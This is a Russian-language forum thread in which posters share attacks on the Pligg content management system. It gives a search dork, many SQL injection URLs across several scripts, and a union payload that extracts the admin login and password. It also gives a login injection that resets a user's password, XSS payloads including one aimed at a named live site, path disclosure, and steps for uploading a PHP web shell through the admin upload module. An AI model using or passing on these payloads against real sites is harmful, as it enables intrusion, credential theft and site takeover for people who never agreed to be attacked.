![]() |
Обзор уязвимостей Pligg
Продукт:
Pligg Content Management SystemДорк: Powered By PliggBlind SQL-injection magic_quotes = off /out.php PHP код:
http://pligg/out.php?title=' union select if(true,1,null) -- -example: Цитата:
http://pligg/out.php?url=' union select if(true,1,null) -- -example: Цитата:
register_globals = on /userrss.php PHP код:
http://pligg/userrss.php?user=god&rows=5&status=1&order_field=l ink_date&from_where=from pligg_links where link_id=1 and true -- -example Цитата:
magic_quotes_gpc = off /login.php PHP код:
POST:http://pligg/login.php?processlogin=3&username=root' or false -- - Цитата:
magic_quotes = off /story.php PHP код:
http://pligg/story.php?title=существующий title' and (substring(version(),1,1))>1-- -example: Цитата:
/editlink.php PHP код:
http://pligg/editlink.php?id=-1 union select 1,if(true,'god',1)-- -example: Цитата:
|
AFoST, в версии 1.0.0. все Blind'и не работают)
т.е. разработчики добавили ф-цию "антихак" sanitize(, и теперь код уже выглядит уже так% PHP код:
Pligg 1.0.0 pXSS /register_complete.php PHP код:
Код:
/register_complete.php?user=a<script>alert(/xss/);</script>Код:
http://www.gossipsnipper.com/register_complete.php?user=a<script>alert(/xss/);</script>Код:
/install/header.php |
Full path disclosure
/Config_File.class.phpDirectory listing при удачном htaccess http://pligg/cache/ |
Цитата:
В этом двиге тот самый интересный Сцукокод на смену админского пароля)) Докрутить б... |
User password reset to "password"
Спасибо Gifts за помощь PHP код:
/login.php?processlogin=4&username=" or user_login = "god" /*' and 1=0 UNION select 123/*&confirmationcode=123 |
Version: 1.0.1 (возможно более ранние версии)
Default table prefix: pligg_ SQL Injection Vuln file: /libs/search.php кода довольно много, приводить не буду Exploit: Код:
http://[host]/[path]/search.php?search=paxek&slink=1&scategory=1)+union+select+(select+concat(0x3c62723e,user_login,0x3a,user_pass,0x3c62723e)+from+[prefix]users+where+user_id=1),null,null--+&adv=1Цитата:
Blind SQL Injection Vuln file: /libs/search.php Exploit: Код:
http://[host]/[path]/search.php?search=[search_keywords]&slink=1&scategory=1[inj]&adv=1Написал эксплойт под это дело. Код:
#!/usr/bin/perlПример работы (получение login'а админа): Код:
D:\\$_W3b-x3q\cms_all>pligg_exp.plExploit: Код:
http://[host]/[path]/search.php?search=</title><script>alert(1)</script>Need:admin account Admin --> Modules Устанавливаем модуль Upload (по дефолту не установлен), включаем модуль (кликаем Disable). Далее переходим в Settings --> General Settings в Allowed File Type дописываем расширение php. Добавляем новость и прикрепляем шелл. Шелл будет в /modules/upload/attachments/[name_shell].php |
RulleR, даже если вывода через ошибку нет, всё равно в сплоитах стоит использовать бинарный поиск, как минимум.
|
| Время: 17:26 |